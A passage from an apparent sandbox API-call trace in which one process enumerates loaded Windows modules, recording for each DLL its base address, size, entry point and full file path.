lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")) returned 0x1b [0073.395] CoTaskMemFree (pv=0xd93200) [0073.395] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa0c0000, lpmodinfo=0x244fe08, cb=0x18 | out: lpmodinfo=0x244fe08*(lpBaseOfDll=0x7fefa0c0000, SizeOfImage=0x10000, EntryPoint=0x7fefa0c1010)) returned 1 [0073.397] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.397] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa0c0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sfc_os.DLL") returned 0xa [0073.398] CoTaskMemFree (pv=0xd93200) [0073.398] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.398] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa0c0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc_os.DLL" (normalized: "c:\\windows\\system32\\sfc_os.dll")) returned 0x1e [0073.400] CoTaskMemFree (pv=0xd93200) [0073.400] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc940000, lpmodinfo=0x2451fc8, cb=0x18 | out: lpmodinfo=0x2451fc8*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0073.406] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.406] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc940000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0073.407] CoTaskMemFree (pv=0xd93200) [0073.407] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.407] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc940000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0073.409] CoTaskMemFree (pv=0xd93200) [0073.409] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefe070000, lpmodinfo=0x2454188, cb=0x18 | out: lpmodinfo=0x2454188*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0073.410] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.410] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefe070000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0073.412] CoTaskMemFree (pv=0xd93200) [0073.412] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.412] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefe070000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0073.414] CoTaskMemFree (pv=0xd93200) [0073.414] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff2d0000, lpmodinfo=0x2456348, cb=0x18 | out: lpmodinfo=0x2456348*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0073.415] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.415] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff2d0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0073.417] CoTaskMemFree (pv=0xd93200) [0073.417] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.417] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff2d0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0073.419] CoTaskMemFree (pv=0xd93200) [0073.419] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd780000, lpmodinfo=0x2458508, cb=0x18 | out: lpmodinfo=0x2458508*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0073.421] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.421] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd780000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0073.423] CoTaskMemFree (pv=0xd93200) [0073.423] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.423] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd780000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0073.424] CoTaskMemFree (pv=0xd93200) [0073.425] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3ee0000, lpmodinfo=0x245a6c8, cb=0x18 | out: lpmodinfo=0x245a6c8*(lpBaseOfDll=0x7fef3ee0000, SizeOfImage=0x33000, EntryPoint=0x7fef3f0a834)) returned 1 [0073.426] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.426] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3ee0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sqlceoledb30.dll") returned 0x10 [0073.428] CoTaskMemFree (pv=0xd93200) [0073.428] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.428] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3ee0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqlceoledb30.dll" (normalized: "c:\\windows\\system32\\sqlceoledb30.dll")) returned 0x24 [0073.430] CoTaskMemFree (pv=0xd93200) [0073.430] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3e60000, lpmodinfo=0x245c8a8, cb=0x18 | out: lpmodinfo=0x245c8a8*(lpBaseOfDll=0x7fef3e60000, SizeOfImage=0x74000, EntryPoint=0x7fef3ec0524)) returned 1 [0073.432] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.432] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3e60000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sqlcese30.dll") returned 0xd [0073.434] CoTaskMemFree (pv=0xd93200) [0073.434] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.434] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3e60000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqlcese30.dll" (normalized: "c:\\windows\\system32\\sqlcese30.dll")) returned 0x21 [0073.436] CoTaskMemFree (pv=0xd93200) [0073.436] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3d80000, lpmodinfo=0x245ea78, cb=0x18 | out: lpmodinfo=0x245ea78*(lpBaseOfDll=0x7fef3d80000, SizeOfImage=0xd1000, EntryPoint=0x7fef3e38628)) returned 1 [0073.438] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.438] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3d80000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="sqlceqp30.dll") returned 0xd [0073.440] CoTaskMemFree (pv=0xd93200) [0073.440] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.440] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3d80000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqlceqp30.dll" (normalized: "c:\\windows\\system32\\sqlceqp30.dll")) returned 0x21 [0073.442] CoTaskMemFree (pv=0xd93200) [0073.442] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3cf0000, lpmodinfo=0x2460c48, cb=0x18 | out: lpmodinfo=0x2460c48*(lpBaseOfDll=0x7fef3cf0000, SizeOfImage=0x85000, EntryPoint=0x7fef3d37bb0)) returned 1 [0073.444] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.444] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3cf0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="WinSATAPI.dll") returned 0xd [0073.446] CoTaskMemFree (pv=0xd93200) [0073.446] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.446] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3cf0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WinSATAPI.dll" (normalized: "c:\\windows\\system32\\winsatapi.dll")) returned 0x21 [0073.448] CoTaskMemFree (pv=0xd93200) [0073.448] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefadb0000, lpmodinfo=0x2462e30, cb=0x18 | out: lpmodinfo=0x2462e30*(lpBaseOfDll=0x7fefadb0000, SizeOfImage=0xa7000, EntryPoint=0x7fefadc050c)) returned 1 [0073.450] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.450] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefadb0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="dxgi.dll") returned 0x8 [0073.453] CoTaskMemFree (pv=0xd93200) [0073.453] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.453] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefadb0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")) returned 0x1c [0073.455] CoTaskMemFree (pv=0xd93200) [0073.455] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbca0000, lpmodinfo=0x2465208, cb=0x18 | out: lpmodinfo=0x2465208*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0073.457] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.457] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbca0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0073.459] CoTaskMemFree (pv=0xd93200) [0073.459] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.459] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbca0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0073.461] CoTaskMemFree (pv=0xd93200) [0073.461] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefbeb0000, lpmodinfo=0x24673c8, cb=0x18 | out: lpmodinfo=0x24673c8*(lpBaseOfDll=0x7fefbeb0000, SizeOfImage=0x215000, EntryPoint=0x7fefc0864b0)) returned 1 [0073.463] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.463] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefbeb0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="gdiplus.dll") returned 0xb [0073.465] CoTaskMemFree (pv=0xd93200) [0073.465] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.465] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefbeb0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")) returned 0x73 [0073.467] CoTaskMemFree (pv=0xd93200) [0073.467] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdc80000, lpmodinfo=0x2469630, cb=0x18 | out: lpmodinfo=0x2469630*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0073.469] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.469] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdc80000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0073.472] CoTaskMemFree (pv=0xd93200) [0073.472] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.472] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdc80000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0073.474] CoTaskMemFree (pv=0xd93200) [0073.474] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9a0000, lpmodinfo=0x246b800, cb=0x18 | out: lpmodinfo=0x246b800*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0073.476] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.476] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0073.478] CoTaskMemFree (pv=0xd93200) [0073.479] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.479] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9a0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0073.481] CoTaskMemFree (pv=0xd93200) [0073.482] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd980000, lpmodinfo=0x246d9d0, cb=0x18 | out: lpmodinfo=0x246d9d0*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0073.484] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.484] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd980000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0073.486] CoTaskMemFree (pv=0xd93200) [0073.486] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.487] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd980000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0073.490] CoTaskMemFree (pv=0xd93200) [0073.490] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3af0000, lpmodinfo=0x246fb90, cb=0x18 | out: lpmodinfo=0x246fb90*(lpBaseOfDll=0x7fef3af0000, SizeOfImage=0x1f2000, EntryPoint=0x7fef3af101c)) returned 1 [0073.492] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.492] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3af0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="msxml6.dll") returned 0xa [0073.497] CoTaskMemFree (pv=0xd93200) [0073.497] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.497] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3af0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")) returned 0x1e [0073.500] CoTaskMemFree (pv=0xd93200) [0073.500] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd9e0000, lpmodinfo=0x2471d50, cb=0x18 | out: lpmodinfo=0x2471d50*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0073.503] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.503] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0073.506] CoTaskMemFree (pv=0xd93200) [0073.507] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.507] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd9e0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0073.510] CoTaskMemFree (pv=0xd93200) [0073.510] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd820000, lpmodinfo=0x2473f10, cb=0x18 | out: lpmodinfo=0x2473f10*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0073.513] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.513] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd820000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0073.516] CoTaskMemFree (pv=0xd93200) [0073.516] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.516] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd820000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0073.519] CoTaskMemFree (pv=0xd93200) [0073.519] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc2b0000, lpmodinfo=0x24760d0, cb=0x18 | out: lpmodinfo=0x24760d0*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0073.522] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.522] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc2b0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0073.529] CoTaskMemFree (pv=0xd93200) [0073.529] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.529] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc2b0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0073.532] CoTaskMemFree (pv=0xd93200) [0073.532] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd640000, lpmodinfo=0x2478358, cb=0x18 | out: lpmodinfo=0x2478358*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0073.535] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.535] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd640000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0073.538] CoTaskMemFree (pv=0xd93200) [0073.538] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.539] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd640000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0073.542] CoTaskMemFree (pv=0xd93200) [0073.542] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb800000, lpmodinfo=0x247a518, cb=0x18 | out: lpmodinfo=0x247a518*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0073.549] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.550] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb800000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0073.553] CoTaskMemFree (pv=0xd93200) [0073.553] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.553] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb800000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0073.556] CoTaskMemFree (pv=0xd93200) [0073.557] GetModuleInformation (in: hProcess=0x214, hModule=0x7feffae0000, lpmodinfo=0x247c6d8, cb=0x18 | out: lpmodinfo=0x247c6d8*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0073.560] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.560] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feffae0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0073.563] CoTaskMemFree (pv=0xd93200) [0073.563] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.564] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feffae0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0073.567] CoTaskMemFree (pv=0xd93200) [0073.567] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd070000, lpmodinfo=0x247e898, cb=0x18 | out: lpmodinfo=0x247e898*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0073.571] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.571] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd070000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0073.574] CoTaskMemFree (pv=0xd93200) [0073.574] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.574] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd070000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0073.578] CoTaskMemFree (pv=0xd93200) [0073.578] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefcd70000, lpmodinfo=0x2480a58, cb=0x18 | out: lpmodinfo=0x2480a58*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0073.581] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.582] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefcd70000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0073.585] CoTaskMemFree (pv=0xd93200) [0073.585] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.585] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefcd70000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0073.591] CoTaskMemFree (pv=0xd93200) [0073.592] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd760000, lpmodinfo=0x2482c18, cb=0x18 | out: lpmodinfo=0x2482c18*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0073.595] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.595] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd760000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0073.598] CoTaskMemFree (pv=0xd93200) [0073.598] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.598] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd760000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0073.601] CoTaskMemFree (pv=0xd93200) [0073.601] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef3ad0000, lpmodinfo=0x2484e00, cb=0x18 | out: lpmodinfo=0x2484e00*(lpBaseOfDll=0x7fef3ad0000, SizeOfImage=0x13000, EntryPoint=0x7fef3ad7b68)) returned 1 [0073.604] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.604] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef3ad0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="MSOXMLMF.DLL") returned 0xc [0073.607] CoTaskMemFree (pv=0xd93200) [0073.607] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.607] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef3ad0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")) returned 0x44 [0073.610] CoTaskMemFree (pv=0xd93200) [0073.610] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8bd0000, lpmodinfo=0x2487018, cb=0x18 | out: lpmodinfo=0x2487018*(lpBaseOfDll=0x7fef8bd0000, SizeOfImage=0x19000, EntryPoint=0x7fef8bdee50)) returned 1 [0073.612] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.612] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8bd0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="VCRUNTIME140.dll") returned 0x10 [0073.615] CoTaskMemFree (pv=0xd93200) [0073.615] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.615] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8bd0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")) returned 0x24 [0073.618] CoTaskMemFree (pv=0xd93200) [0073.618] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8bc0000, lpmodinfo=0x24891f8, cb=0x18 | out: lpmodinfo=0x24891f8*(lpBaseOfDll=0x7fef8bc0000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0073.621] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.621] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8bc0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-crt-runtime-l1-1-0.dll") returned 0x21 [0073.624] CoTaskMemFree (pv=0xd93200) [0073.624] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.624] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8bc0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x35 [0073.627] CoTaskMemFree (pv=0xd93200) [0073.627] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8ac0000, lpmodinfo=0x248b418, cb=0x18 | out: lpmodinfo=0x248b418*(lpBaseOfDll=0x7fef8ac0000, SizeOfImage=0xf2000, EntryPoint=0x7fef8ac9060)) returned 1 [0073.630] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.630] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8ac0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="ucrtbase.DLL") returned 0xc [0073.633] CoTaskMemFree (pv=0xd93200) [0073.633] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.633] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8ac0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ucrtbase.DLL" (normalized: "c:\\windows\\system32\\ucrtbase.dll")) returned 0x20 [0073.637] CoTaskMemFree (pv=0xd93200) [0073.637] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8ab0000, lpmodinfo=0x248d5e8, cb=0x18 | out: lpmodinfo=0x248d5e8*(lpBaseOfDll=0x7fef8ab0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.640] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.641] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8ab0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-core-timezone-l1-1-0.dll") returned 0x23 [0073.645] CoTaskMemFree (pv=0xd93200) [0073.645] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.645] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef8ab0000, lpFilename=0xd93200, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x37 [0073.649] CoTaskMemFree (pv=0xd93200) [0073.649] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef8aa0000, lpmodinfo=0x248f808, cb=0x18 | out: lpmodinfo=0x248f808*(lpBaseOfDll=0x7fef8aa0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0073.653] CoTaskMemAlloc (cb=0x804) returned 0xd93200 [0073.653] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef8aa0000, lpBaseName=0xd93200, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l2-1-0.dll") returned 0x1f [0073.657] CoTaskMemFree (pv=0xd93200) 